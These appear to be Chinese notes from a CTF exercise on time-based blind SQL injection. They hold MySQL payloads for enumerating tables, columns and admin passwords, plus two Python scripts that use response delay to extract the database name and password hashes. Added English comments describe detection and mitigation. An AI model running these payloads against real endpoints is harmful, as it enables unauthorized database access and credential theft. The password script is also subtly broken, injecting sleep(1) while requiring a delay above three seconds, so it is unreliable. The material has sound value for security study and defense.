盲注

一、语句

测试语句:

if(ascii(mid(1,1,1))like(49),sleep(3),1)

1、表:

if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),1,1))like(97),sleep(30),1)

2、列:

if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where((table_name)like(0x61646d696e))),1,1))like(105),sleep(30),1)

3、字段:


if(ascii(mid((select(group_concat(password))from(admin)),1,1))like(55),sleep(30),1)

二、爆破数据库脚本

import requests
from time import sleep

# Time-based blind SQL injection probe (MySQL), enumerating the current database
# name one character at a time. The injectable parameter is `id`; the payload is
# concatenated directly onto the query string below with no encoding.
# Defender's view: this produces a burst of near-identical GET requests to one
# endpoint that differ only in two numeric literals, each matching request stalling
# for ~3 s. Requests containing `sleep(`/`information_schema` in a query parameter,
# or a high rate of such requests to one handler, are a straightforward WAF/SIEM
# signal; parameterized queries on the server remove the underlying flaw.
url = "http://192.168.8.148/sql.php?id="

# i = 1-based character position passed to mid(); j = candidate ASCII code (32..127).
for i in range(1, 100):
	for j in range(32, 128):
		# MySQL conditional: if ascii(i-th char of database()) == j then sleep(3) else 1.
		payload = "if(ascii(mid((select(database()))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)"

		# Raw concatenation: the payload is sent verbatim as the value of `id`.
		res = requests.get(url+payload)

		# Decision oracle is response latency only: a match is inferred when the
		# server took longer than 3 s, after which the next position is probed.
		if res.elapsed.total_seconds() > 3:
			print(chr(j), end='')
			break


# Unused module-level string (never executed): the author's notes listing the
# payload templates for the database name, table names and column names.
'''
数据库
if(ascii(mid((select(database()))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)


表名
if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database())))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)

字段名
if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where((table_name)like(\"test_sql\")))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)

'''

三、跑密码的脚本

import requests
from time import sleep

# Second time-based blind probe, this time reading admin.password character by
# character (positions 1..32) from a CTF target. Same traffic shape as the script
# above: one GET per candidate character, differing only in numeric literals, with
# the inferred match signalled by server-side delay. Rate limiting on the
# handler, alerting on `sleep(` in query parameters, and prepared statements
# are the corresponding detection and mitigation points.
url = "http://ctf1-1.anfu.hillstonenet.com:8081/single.php?id="



# i = 1-based position within the concatenated password values.
for i in range(1, 33):
   # j = candidate ASCII code; the filter below restricts it to '0'-'9' and 'a'-'z'.
   for j in range(47, 128):
       if(47<j<58 or 96<j<123):
           # Conditional-delay payload for position i / candidate j, sent verbatim.
           d = "if(ascii(mid((select(group_concat(password))from(admin))," + str(i) + ",1))like(" + str(j) + "),sleep(1),1)"
           r = requests.get(url + d)
           # Latency-only oracle: elapsed time above 3 s is treated as a match.
           if r.elapsed.total_seconds() > 3:
               print(chr(j))
               break             